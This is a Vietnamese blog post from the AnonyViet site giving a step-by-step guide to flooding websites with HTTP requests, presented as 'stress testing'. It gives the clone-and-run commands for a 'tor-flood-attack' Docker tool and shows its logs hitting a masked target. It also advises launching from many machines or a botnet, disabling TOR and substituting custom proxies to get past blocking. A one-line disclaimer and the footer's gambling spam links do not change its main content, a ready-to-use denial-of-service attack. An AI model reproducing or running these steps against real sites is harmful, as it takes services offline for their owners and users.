• Network
  • Security
  • Software
  • Thủ thuật
  • Tin tức
  • Video hướng dẫn
  • Donate – Mời AnonyViet ly Cafe ☕
AnonyViet
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
AnonyViet
No Result
View All Result

Cách Stress Test Website bằng cách tấn công HTTP Flood

Ellyx13 by Ellyx13
in Basic Hacking
Reading Time: 5 mins read
A A
2

Mục lục bài viết

  1. Thực hiện tấn công HTTP Flood
  2. Tại sao cách tấn công HTTP flood không hiệu quả?

HTTP flood là một nhánh con của các cuộc tấn công DDoS nói chung, với một điểm khác biệt chính là khi thực hiện HTTP flood, kẻ tấn công thực hiện các yêu cầu HTTP GET/POST/PUT “hợp pháp” để đặt thêm tải lên máy chủ web/ứng dụng.

Tham gia kênh Telegram của AnonyViet  👉 Link 👈

Tuyên bố từ chối trách nhiệm: Bài viết này chỉ dành cho mục đích giáo dục. Bạn phải tự chịu rủi ro nếu làm theo hướng dẫn. Không tấn công trang web mà bạn không sở hữu hoặc bạn không có quyền stress test.

Các bài viết liên quan

antiddos vddos

Dịch vụ “AntiDDoS miễn phí” cho các Website

31/01/2023
CAI VDDOS CHONG DDOS WEBSITE

Hướng dẫn AntiDDoS Layer 7 bằng vDDoS Proxy Protection

22/10/2022 - Updated on 23/10/2022
Tổng kết Event DDos vào mục tiêu AnonyViet 2

Tổng kết Event DDos vào mục tiêu AnonyViet

23/09/2022
antiddos bằng flyingproxy

Cách dùng FlyingProxy chống DDoS bằng hạ tầng của Cloudflare Enterprise

18/09/2022 - Updated on 19/09/2022

Cách stress test web bằng cách tấn công HTTP Flood

Cách tiếp cận này đặc biệt hiệu quả nếu bạn có thể tìm ra những yêu cầu nào gây tốn kém cho máy chủ. Truy xuất/tính toán một số dữ liệu và gây căng thẳng cho cơ sở dữ liệu/phần cứng máy chủ hoặc tải xuống các tệp lớn hơn buộc lưu lượng phải bổ sung qua mạng. Yêu cầu HTTP càng nhiều thì càng tốt.

Các cuộc tấn công HTTP flood có thể khiến ứng dụng được nhắm mục tiêu không phản hồi, hoặc thậm chí làm sập hoàn toàn ứng dụng. Và hôm nay chúng ta sẽ tìm hiểu thêm về cách tấn công HTTP flood.

Thực hiện tấn công HTTP Flood

Mình có tìm được một công cụ thực hiện các cuộc tấn công HTTP flood và mình sẽ hướng dẫn các bạn cách sử dụng nó một cách ngắn gọn. Bạn có thể xem công cụ đó tại đây. Nếu bạn muốn làm theo hướng dẫn này thì hãy chuẩn bị PC/máy chủ của bạn bằng cách cài đặt Docker và chạy lệnh docker -omp

Bước này khá dễ nên mình sẽ bỏ qua, sau khi Docker đã sẵn sàng, bạn chỉ cần sao chép kho lưu trữ, điều hướng đến thư mục gốc của dự án và chạy lệnh docker-compos:

git clone https://github.com/JPLeoRX/tor-flood-attack.git
cd tor-flood-attack
docker-compose up --build -d && docker-compose logs -f -t

Bạn sẽ thấy nhật ký build và sau đó các container sẽ được tạo:

...
Successfully built 7d3537fa2051
Successfully tagged tor-flood-attack_app:latest
Creating tor-flood-attack_app_1  ... done
Creating tor-flood-attack_app_2  ... done
Creating tor-flood-attack_app_3  ... done
Creating tor-flood-attack_app_4  ... done
Creating tor-flood-attack_app_5  ... done
Creating tor-flood-attack_app_6  ... done
Creating tor-flood-attack_app_7  ... done
Creating tor-flood-attack_app_8  ... done
Creating tor-flood-attack_app_9  ... done
Creating tor-flood-attack_app_10 ... done
Creating tor-flood-attack_app_11 ... done
Creating tor-flood-attack_app_12 ... done
...

Dành thêm vài phút để công cụ khởi chạy TOR và Privoxy, và nếu thành công, bạn sẽ thấy đầu ra tương tự như này, hiển thị cho bạn số liệu thống kê của từng yêu cầu tấn công:

...
app_1  | 2022-02-27T14:50:39.803225587Z debug_stats(): ----------------------- 
app_1  | 2022-02-27T14:50:39.803292708Z debug_stats(): https://XXXXXX.com
app_1  | 2022-02-27T14:50:39.804966586Z debug_stats(): Total responses count: 390
app_1  | 2022-02-27T14:50:39.805010847Z debug_stats(): Success responses: 390
app_1  | 2022-02-27T14:50:39.805024164Z debug_stats(): Execution time is 1.06 s, speed is 369.1 r/s
...

Giờ bạn chỉ cần xem trang web mục tiêu phản hồi chậm như thế nào. Chỉ cần đảm bảo chọn một mục tiêu.

Như với bất kỳ cuộc tấn công DDoS nào – từ khóa ở đây là “phân tán”, HTTP flood sẽ cực kỳ hiệu quả khi được khởi chạy từ một số máy chủ/PC cùng một lúc. Bạn càng có nhiều phiên đang chạy thì bạn càng có thể gây căng thẳng cho trang web mục tiêu.

Ngoài ra, bạn cũng có thể thử các cài đặt hiệu suất như được mô tả trong README.md, bạn có thể gửi nhiều yêu cầu hơn mỗi giây từ kết nối của mình.

Tại sao cách tấn công HTTP flood không hiệu quả?

Vấn đề lớn nhất là TOR proxy (mặc dù rất tốt trong việc ẩn địa chỉ IP của máy bạn) có những nhược điểm riêng. Trước hết, nó chậm, các yêu cầu được thực hiện thông qua TOR chậm hơn rất nhiều. Sau đó, chúng ta gặp sự cố ngắt kết nối liên tục, proxy TOR có thể ngắt kết nối, từ chối kết nối,… Nhìn chung, điều này khá phiền và trong trường hợp xấu nhất, khoảng 1/3 yêu cầu của bạn có thể bị mất do những vấn đề này.

Thực sự rất dễ để bất kỳ máy chủ web nào chặn tất cả lưu lượng truy cập đến từ TOR. Vậy nên nếu bạn vẫn muốn thực hiện cuộc tấn công và không ngại để lộ IP của mình (ví dụ: nếu bạn chạy một mạng botnet) thì bạn có thể làm như vậy. Chỉ cần thay đổi biến ENABLE_TOR thành 0 trong docker-compos.yml:

...
ENABLE_TOR: 0
...

Hơn nữa, nếu bạn biết mình đang làm gì, bạn có thể đặt proxy HTTP của riêng mình trong main_aiohttp.py bằng cách ghi đè biến proxy trong hàm epoch:

...
async def epoch(epoch_number: int):
    ...
    # For each target
    for i in range(0, len(LIST_OF_URLS)):
        ...
        proxy = None
        if ENABLE_TOR:
            proxy = "http://127.0.0.1:8118"
        else:
            print('epoch(): WARNING!!!! TOR is disabled!!!!')
        ...
    ...
...

Chỉ cần lưu ý rằng việc chặn địa chỉ IP của máy tính hoặc VPN của bạn cũng khá dễ dàng.

Tuy nhiên, mặc dù có những nhược điểm trên, nhưng HTTP flood có thể có hiệu quả trên các ứng dụng web không có bất kỳ biện pháp phòng chống DDoS tự động nào.

Bài viết đạt: 5/5 - (100 bình chọn)
Tags: DDOSHTTP Floodstress testĐos
Ellyx13

Ellyx13

Có người không dám bước vì sợ gãy chân, nhưng sợ gãy chân mà không dám bước đi thì khác nào chân đã gãy.

Related Posts

Cách Sao chép Chứng chỉ số từ App này sang App khác 3
Basic Hacking

Cách Sao chép Chứng chỉ số từ App này sang App khác

10/03/2023
code virus pha huy mbr o cung
Basic Hacking

Code phá hủy MBR ổ cứng – Tấn công và phòng chống

19/02/2023
tool scan xss Dalfox
Basic Hacking

Cách scan lỗ hổng XSS tự động với Dalfox

06/02/2023
HackingTool - Tổng hợp công cụ dành cho hacker
Basic Hacking

HackingTool – Tổng hợp tool hack dành cho hacker

10/01/2023 - Updated on 11/01/2023
osint truy vet gmail ghunt v2
Basic Hacking

Truy tìm chủ tài khoản Gmail bằng Ghunt V2 (Gmail OSINT)

19/12/2022
Lộ trình để trở thành Hacker thực thụ
Basic Hacking

Lộ trình để trở thành Hacker thực thụ

18/11/2022
Next Post
Cách tự động kích hoạt File Python khi cắm USB 4

Cách tự động kích hoạt File Python khi cắm USB

guest

guest

Website này sử dụng Akismet để hạn chế spam. Tìm hiểu bình luận của bạn được duyệt như thế nào.

2 Comments
oldest
newest
Inline Feedbacks
View all comments
Ẩn Danh VIP
Ẩn Danh VIP
8 months ago

Mình theo dõi web khá lâu rồi.
ad có thể làm 1 bài hướng dẫn chi tiết nhất về việc chống ddos.
cài rate limit vô Nginx hoặc cài limit bằng iptables cho vps không ạ.

Reply
AnonyViet
Admin
AnonyViet
8 months ago
Reply to  Ẩn Danh VIP

bạn search seri antiddos của vietnix nhé, có đủ luôn

Reply
wpdiscuz   wpDiscuz

Asia 300×600

Liên hệ Quảng Cáo

Lien he AnonyViet

Đối tác —

Fshare

Các bài mới

cac nhom hacker apt tren the gioi

Tổng hợp các nhóm Hacker APT trên thế giới

25/03/2023
Cách dùng AI của DALL-E 2 để tạo hình ảnh theo ý bạn 5

Cách dùng AI của DALL-E 2 để tạo hình ảnh theo ý bạn

24/03/2023
kiem tra file folder lon nhat linux

Cách tìm File/Folder lớn nhất trên Linux

23/03/2023
Cách đăng ký và sử dụng Google Bard - AI của Google 6

Cách đăng ký và sử dụng Google Bard – AI của Google

22/03/2023
Xiaomi Redmi Note 12 | Pro 5G giá bao nhiêu, mua điện thoại nào tốt? 7

Xiaomi Redmi Note 12 | Pro 5G giá bao nhiêu, mua điện thoại nào tốt?

22/03/2023

Ads

Giới thiệu

AnonyViet

AnonyViet

Nơi chia sẻ những kiến thức mà bạn chưa từng được học trên ghế nhà trường!

Chúng tôi sẵn sàng đón những ý kiến đóng góp, cũng như bài viết của các bạn gửi đến AnonyViet.

Hãy cùng AnonyViet xây dựng một cộng đồng CNTT lớn mạnh nhất!

Giới thiệu

AnonyViet là Website chia sẻ miễn phí tất cả các kiến thức về công nghệ thông tin. AnonyViet cung cấp mọi giải pháp về mạng máy tính, phần mềm, đồ họa và MMO.

Liên hệ

Email: anonyviet.com[@]gmail.com

1409 Hill Street #01-01A
Old Hill Street Police Station
Singapore 179369

 

Bản quyền: DMCA.com Protection Status

Phản hồi gần đây

  • thái trong Download IObit Uninstaller 12 Full Key – Gỡ bỏ phần mềm tận gốc
  • tiến trong Hướng dẫn Fake link Facebook để spam
  • Mạnh Cường trong Cách đăng ký và sử dụng Google Bard – AI của Google
  • Co Dang trong Cách Active Microsoft 365 Miễn Phí
  • hoahung trong Tổng quan về giới UG. Phần 1: UG là gì, CC chùa là gì
https://shbet8.org

©2023 AnonyViet - Chúng tôi mang đến cho bạn những kiến thức bổ ích về Công nghệ. Google Bing Github Github stackoverflow Youtube wikipedia reddit iwinclublink.app tải game iwin tải iwin apk tải tdtc w88 top tải win456 iwin888 ku11net.co ku fun twin F8BET https://new8869.com https://okuytin.com

No Result
View All Result
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC

©2023 AnonyViet - Chúng tôi mang đến cho bạn những kiến thức bổ ích về Công nghệ. Google Bing Github Github stackoverflow Youtube wikipedia reddit iwinclublink.app tải game iwin tải iwin apk tải tdtc w88 top tải win456 iwin888 ku11net.co ku fun twin F8BET https://new8869.com https://okuytin.com

wpDiscuz
!

Ads

Ads Blocker Detected!!! - Vui lòng tắt Ad Blocker!!!

Vui lòng tắt Ad Blocker

Có vẻ như bạn đang bật trình chặn Quảng cáo.

{Trường hợp bạn đang dùng trình duyệt từ Facebook, hãy copy link bài viết qua Chrome để xem nội dung, như vậy sẽ không bị chặn}

Website chúng tôi duy trì nhờ vào doanh thu quảng cáo, vì vậy hãy tắt trình chặn quảng cáo để chúng tôi có kinh phí chi trả tiền thuê Server, xin cảm ơn!

I've disable Adblock - Tôi đã tắt Adblock